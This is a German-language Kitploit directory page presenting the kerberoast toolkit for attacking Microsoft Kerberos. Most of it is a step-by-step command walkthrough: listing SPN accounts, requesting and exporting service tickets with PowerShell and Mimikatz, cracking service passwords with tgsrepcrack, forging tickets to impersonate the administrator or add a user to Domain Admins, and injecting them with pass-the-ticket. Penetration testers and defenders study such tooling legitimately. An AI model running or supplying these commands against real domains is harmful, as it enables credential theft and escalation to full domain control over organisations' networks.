Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
kerberoast — Toolkit für Angriffe auf MS-Kerberos-Implementierungen: SPN-Konten extrahieren, Tickets anfordern und exportieren, Dienstpasswörter knacken, Tickets zur Identitätswechsel und Rechteausweitung umschreiben. | Kitploit
Tools/GitHubGitHub/nidem/kerberoast
PasswortangriffeExploitationPenetrationstestsAuthentifizierung
GitHubnidem/kerberoast

kerberoast

Toolkit für Angriffe auf MS-Kerberos-Implementierungen: SPN-Konten extrahieren, Tickets anfordern und exportieren, Dienstpasswörter knacken, Tickets zur Identitätswechsel und Rechteausweitung umschreiben.

Repository anzeigen
1.5k31219vor 3 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

kerberoast

Kerberoast ist eine Reihe von Werkzeugen zum Angriff auf MS-Kerberos-Implementierungen. Im Folgenden finden Sie einen kurzen Überblick über die Funktionen der einzelnen Werkzeuge.

Extrahieren aller als SPN verwendeten Konten mit integrierten MS-Tools

PS C:\> setspn -T medin -Q */*

Ticket(s) anfordern

Ein Ticket:

PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "HTTP/web01.medin.local"  

Alle Tickets

PS C:\> Add-Type -AssemblyName System.IdentityModel  
PS C:\> setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }  

Die erworbenen Tickets aus dem Arbeitsspeicher mit Mimikatz extrahieren

mimikatz # kerberos::list /export

Knacken mit tgsrepcrack

./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi

Umschreiben

Benutzer als anderen Benutzer erscheinen lassen

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500  

Benutzer zu einer anderen Gruppe hinzufügen (hier: Domain-Admin)

./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512  

Zurück in den Arbeitsspeicher mit Mimikatz injizieren

kerberos::ptt sql.kirbi
Tool herunterladen